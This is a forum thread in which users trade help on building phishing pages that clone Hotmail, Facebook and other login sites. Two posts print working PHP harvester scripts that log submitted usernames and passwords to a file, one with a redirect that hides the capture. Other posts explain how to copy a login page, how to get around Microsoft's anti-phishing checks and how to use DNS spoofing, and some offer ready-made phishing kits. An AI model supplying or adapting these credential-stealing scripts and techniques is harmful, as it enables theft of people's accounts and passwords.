omfgplz Posted December 19, 2012 Share Posted December 19, 2012 Can anyone support? :) Either with files or a guide with how to for nubies like me. Link to comment Share on other sites More sharing options...
coolgeek Posted December 20, 2012 Share Posted December 20, 2012 (edited) I have found the easiest way to clone a site is to use google chrome, browser to the site, right-click and select Save As... This gives you the option to download the entire page with all dependencies. From there, just use this resource to modify what happens to the form data. I think Darren wrote the following little php file to store the user credentials from the form data received: <?php $ref = $_SERVER['HTTP_REFERER']; $today = date("F j, Y, g:i a"); if (isset($_POST['name']) && !empty($_POST['name'])) { $nam = stripslashes($_POST['name']); $pas = stripslashes($_POST['pass']); $nam = htmlspecialchars($nam, ENT_QUOTES); $pas = htmlspecialchars($pas, ENT_QUOTES); $content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas; $filed = @fopen("bitches.txt", "a+"); @fwrite($filed, "$content\n"); @fclose($filed); } ?> Edited December 20, 2012 by coolgeek Link to comment Share on other sites More sharing options...
loozr Posted December 20, 2012 Share Posted December 20, 2012 Have anybody managed to make a functional hotmail phish yet? I'm struggling to get it working.. The thing is that it seems M$ is trying to avoid phishing attacks by using some scripting. I have very limited knowledge in web programming, but have been snooping around a little bit in their code, and it seems that 1. You can't avoid the scripts totally because then you will not be able to type username/password. 2. The script mbox.js is checking if a cookie is valid by checking session and pc id. If this cookie is not found to be legit, you will be redirected to https://login.live.com/cookiesDisabled.srf?.. Now I guess there is some magic happening in the 13'th line in the hotmail source code, but for a noob it's quite exhausting to make sense of.. Link to comment Share on other sites More sharing options...
Sud0x3 Posted December 20, 2012 Share Posted December 20, 2012 If you cant achieve this then you have a long way to go and i am assuming no one here is going to do this for you. I will however give you a little information, You need a copy of the login page and a scipt that will take the data entered into user name and password fields and save or send it somewhere. More complex scripts are sometimes able to take the information and log the user into the target site, To use this attack on someone with any knowledge of computing whatsoever you will need to employ attacks like dns spoofing. @loozr you do not require any of the scripts hosted on the target site, you simply need a site that looks like the target. Link to comment Share on other sites More sharing options...
loozr Posted December 20, 2012 Share Posted December 20, 2012 @Sud0x3 That's absolutely true. However, for me it's faster to hack around in the existing code, than to make a similar page myself from scratch(since my knowledge in code is quite limited, I can read some, but not write). I have managed to edit out most of the scripting in this page, and successfully come up with an ok result. However, I have a little problem in getting the "Sign in" button to do some posting now.. or, actually it''s doing something, it's removing the input, but I'm not getting any post in return. And yes I have edited the name of the inputfields to equal the "pickup"script.. Is there any app that can trace the actions in a given webpage? Link to comment Share on other sites More sharing options...
AlienG Posted January 4, 2013 Share Posted January 4, 2013 Can someone help me put? My problem is that on the below script after testing Facebook page nothing is saved on pineapple.log. Or should I use the one Darren has posted? Thanks <?php $ref = $_SERVER['HTTP_REFERER']; $today = date("F j, Y, g:i a"); if (isset($_POST['name']) && !empty($_POST['name'])) { $nam = stripslashes($_POST['name']); $pas = stripslashes($_POST['pass']); $nam = htmlspecialchars($nam, ENT_QUOTES); $pas = htmlspecialchars($pas, ENT_QUOTES); $content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas; $filed = @fopen("pineapple/phish.log", "a+"); @fwrite($filed, "$content\n"); @fclose($filed); } ?> <html><body> <script type=text/javascript"> function goBack() { window.history.back() } </script> </head> <body onload="goBack()"> </body></html> Link to comment Share on other sites More sharing options...
RebelCork Posted January 5, 2013 Share Posted January 5, 2013 Has anyone tried using SET to try to clone the page. If you are using BT5, go to var/www and browse files. Should do a passable job. If you want to wait a while longer, wait for WhistleMaster's new module, the MITM/keylogger to come about. All depending on what you want :) Link to comment Share on other sites More sharing options...
TylerCPU Posted February 3, 2013 Share Posted February 3, 2013 I created a whole bunch of phishing pages that will work with the pineapple. Outlook, Hotmail, netflix, blogger, youtube, facebook, twitter,instagram, etc... Please use them responsibly. Link: **Removed** Link to comment Share on other sites More sharing options...
NullNull Posted February 5, 2013 Share Posted February 5, 2013 I created a whole bunch of phishing pages that will work with the pineapple. Outlook, Hotmail, netflix, blogger, youtube, facebook, twitter,instagram, etc... Please use them responsibly. Link: **Removed** Very nice work TylerCPU !!! I really liked the thing with the images at hotmail instagram and outlook! Any chance of creating the mobile versions of them? :D Link to comment Share on other sites More sharing options...
TylerCPU Posted February 9, 2013 Share Posted February 9, 2013 Very nice work TylerCPU !!! I really liked the thing with the images at hotmail instagram and outlook! Any chance of creating the mobile versions of them? :D Thanks. I don't know if I will create a mobile version of them. It took me a long time to just create hotmail, outlook, and instagram by hand for the desktop alone. Link to comment Share on other sites More sharing options...
MastermanSachin Posted March 19, 2013 Share Posted March 19, 2013 I created a whole bunch of phishing pages that will work with the pineapple. Outlook, Hotmail, netflix, blogger, youtube, facebook, twitter,instagram, etc... Please use them responsibly. Link: **Removed** will u please upload that .zip file again. this one has been deleted. Link to comment Share on other sites More sharing options...
Mr-Protocol Posted March 19, 2013 Share Posted March 19, 2013 http://forums.hak5.org/index.php?/topic/28813-psa-phishing-pages/ Link to comment Share on other sites More sharing options...
Recommended Posts